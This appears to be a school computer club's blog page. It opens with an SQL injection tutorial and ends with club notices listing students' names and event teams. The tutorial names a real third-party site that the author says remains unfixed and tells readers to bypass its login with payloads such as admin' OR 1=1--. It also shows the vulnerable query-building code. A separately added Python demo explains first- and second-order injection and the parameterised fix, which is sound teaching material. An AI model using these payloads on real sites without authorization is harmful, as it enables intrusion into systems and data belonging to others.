SQL Injection attacks

One of the most common vulnerabilities, found on a large share of sites, is SQL injection. Any site that builds SQL queries for its database out of user input is exposed to it.
An SQL injection attack is delivered through user input that the server does not check or escape before pasting it into a query. The objective is to make the database run SQL the attacker wrote, revealing sensitive information or otherwise compromising the server.
There are two main types of attack. In a first-order attack the attacker sees the result immediately, either in the application's direct response or through some other channel such as e-mail. In a second-order attack the attacker injects data that is stored in the database; the payload is triggered only later, when that stored data is used in another query.

To be precise, a successful injection lets the attacker read, modify or delete the data the database holds, or, as in the example below, log in without knowing a password.
Here is an example:

1) Open the following site: http://www.sanjeevkapoor.com/ . I have already informed the administrator about the loopholes through a letter, but no action has been taken.
2) Click on sign in and type the username as: admin' OR 1=1-- and the password as: ' OR ''=' (either one on its own is enough: the username payload comments the password check out, the password payload makes the WHERE clause true for every row).
Now you see how powerful this injection attack is. To explain how this happened, you need to know a little SQL. This is what actually happens when you supply a username and password to a logon form:
' Classic ASP / VBScript logon check. This is the vulnerable pattern the article
' describes: the user-supplied strings are pasted straight into the SQL text.
SQLQuery = "SELECT Username FROM Users WHERE Username='" & strUsername & "' AND Password='" & strPassword & "'"
strAuthCheck = GetQueryResult(SQLQuery)   ' first column of the first row, or "" if no row
If strAuthCheck = "" Then
    boolAuthenticated = False
Else
    boolAuthenticated = True
End If
The username and password are pasted into an SQL query that searches the Users table for a row matching both. If a match is found, the returned username is stored in strAuthCheck; if that string stays empty you are not authenticated. With the username admin' OR 1=1--, the single quote closes the string the developer opened, OR 1=1 makes the WHERE clause true for every row (one is always equal to one), and -- turns the rest of the line, including the password check, into a comment. The query the database actually runs is SELECT Username FROM Users WHERE Username='admin' OR 1=1, which always returns a row, so the SQL server, which is only being asked whether the query returned anything, treats you as authenticated.
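Here is the logon check above rerun against a tiny SQLite database, as an added example that is not part of the original article. It builds the same concatenated query, tries both payloads from step 2, shows the second-order case from the introduction (a hostile username stored safely at registration is later pasted into an UPDATE), and contrasts each with a parameterised query. The table, the users, their passwords and the password-change feature are all constructed for this example.

```python
"""Added example: the article's login query against an in-memory SQLite
database, showing first-order bypass, second-order injection and the fix.
All data (table, users, passwords) is constructed sample data."""
import sqlite3


def make_db():
    """Constructed sample database mirroring the article's Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    return conn


def build_login_query(username, password):
    """The article's string concatenation: untrusted input is pasted
    straight into the SQL text, quotes and all."""
    return (
        "SELECT Username FROM Users WHERE Username='" + username
        + "' AND Password='" + password + "'"
    )


def login_vulnerable(conn, username, password):
    """Returns the first matching username or None (the article's strAuthCheck)."""
    row = conn.execute(build_login_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised version: the driver passes the values separately from the
    SQL text, so quotes and '--' inside them cannot change the query's structure."""
    row = conn.execute(
        "SELECT Username FROM Users WHERE Username=? AND Password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def register(conn, username, password):
    """Registration uses parameters, so a hostile username is stored verbatim
    and harmlessly. (Hypothetical feature, not from the article.)"""
    conn.execute("INSERT INTO Users VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn, username, new_password):
    """Second-order sink (hypothetical feature): the stored username is read
    back from the database and concatenated into a later query."""
    conn.execute(
        "UPDATE Users SET Password='" + new_password
        + "' WHERE Username='" + username + "'"
    )


def demo():
    """Runs every case and returns the observable results in a dict."""
    conn = make_db()
    results = {}
    # First-order: the article's two payloads, each sufficient on its own.
    results["quote_comment"] = login_vulnerable(conn, "admin' OR 1=1--", "anything")
    results["tautology_pw"] = login_vulnerable(conn, "nobody", "' OR ''='")
    results["safe_quote_comment"] = login_safe(conn, "admin' OR 1=1--", "anything")
    results["safe_tautology_pw"] = login_safe(conn, "nobody", "' OR ''='")
    # Second-order: the attacker registers as admin'-- then changes "their own"
    # password; the stored name turns the UPDATE into ... WHERE Username='admin'--'
    register(conn, "admin'--", "irrelevant")
    change_password_vulnerable(conn, "admin'--", "pwned")
    results["admin_pw_after"] = conn.execute(
        "SELECT Password FROM Users WHERE Username=?", ("admin",)
    ).fetchone()[0]
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

Run it with python3 and look at demo(): both concatenated logins come back as admin without a valid password, both parameterised logins come back as None, and after the second-order step the real admin's password has been overwritten even though the hostile username was stored through a parameterised INSERT. The lesson is that escaping at the entry point is not enough; every query that touches untrusted data, including data read back from the database, must use parameters.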

Article by: Ankit Srivastava
Head, Network Security, Exunclan

CV Raman and Bhaskara Trophy

Bluebells School, Kailash Colony is organising a Science Symposium for the CV Raman and Bhaskara Trophy on July 31, 2007. One speaker and two presenters are required for the same.

A 5 minute presentation needs to be made on the topic “Technology of Mobile Connectivity” on either PowerPoint or Flash MX. If it is made on any other software, then the participants will have to bring the software with them for the event.

All those interested please give in your names before July 20, 2007.

Mata Jai Kaur Public School result

Senior Events

  • Quiz
    Kartikeya Asthana
    Ananth Govind Rajan
  • Programming (C++, VB)
    Aayush Kumar
    Shikhar
  • CEO Hunt
    Aayush Kumar

Junior Events

  • Mobile Phone Website
    Tanay Padhi
    Dwarkesh
  • Treasure Hunt
    Aditya Jain
    Sakshi Gupta
  • Video Editing

Sub Junior Events

  • Junior Quiz
    Shubham Goel
    Rishabh Marya
  • Futuristic Gizmo
    Shubham Goel
    Tanay Padhi

Tech-Edge 2007

Tech Edge 2007 is being organised at Birla Vidya Niketan on the 25th of July. The following students will be participating in the event:

1. Collage Making

  • Aditya Jain
  • Saakshi

2. Web Designing

  • Shubham Goel
  • Rishabh Marya

(Topics: (i) Life in space, (ii) Latest technology, (iii) Indian heritage. Teams should submit a copy of their website on a CD by 21st July.)

3. Senior Programming

  • Anant Jain
  • Abhijit Das

4. Multimedia Presentation

  • Rishabh Marya
  • Shubham Goel

(The topic for the presentation is either (i) XBOX 360 or (ii) Robocop. Teams should submit a copy of their presentation on one of these topics on a CD by 21st July. The software to be used is (i) FrontPage or (ii) Flash.)

Urgent: Exun Member Photos

The following members must report on Thursday (12 July) during BREAK for their photos to be taken for the exunclan website:

Radhika Malik
Ankit Srivastava
Kunal Singh
Akshay Talwar
Srajan Mani Rastogi
Ananth Govind Rajan
Nachiketa Dash
Kanika Singh
Mini Saxena
R. Dwarkesh
Shubham Goel
Rishabh Marya
Tanay Padhi
Adideva Sekhri
Utkarsh Ohm

All members are also requested to update their details (contact info, class, section, etc) in the Exun Members Google spreadsheet.

Meeting

An Exun meeting is scheduled on Thursday, the 12th of July during BREAK to finalize teams for the computer symposium which is being held at Mata Jai Kaur Public School. All Exun members must report.

See you there!

Update Ordinatrix 2007

Teams for the event have been finalised. Anybody who has experience with, or is interested in, the fourth spot in the Movie@trix team should comment away. Participants are:

Movie@trix:
1. Kartikeya Asthana
2. Sahil Bajaj
3. Aviral Goel
4. Aayush Kumar

Anim@trix:
1. Shubham Goel
2. Rishabh Marya

Tunes@trix:
1. Saumya Kharbanda

Ngage@trix:
1. Digvijay Singh
2. Arjun Kumar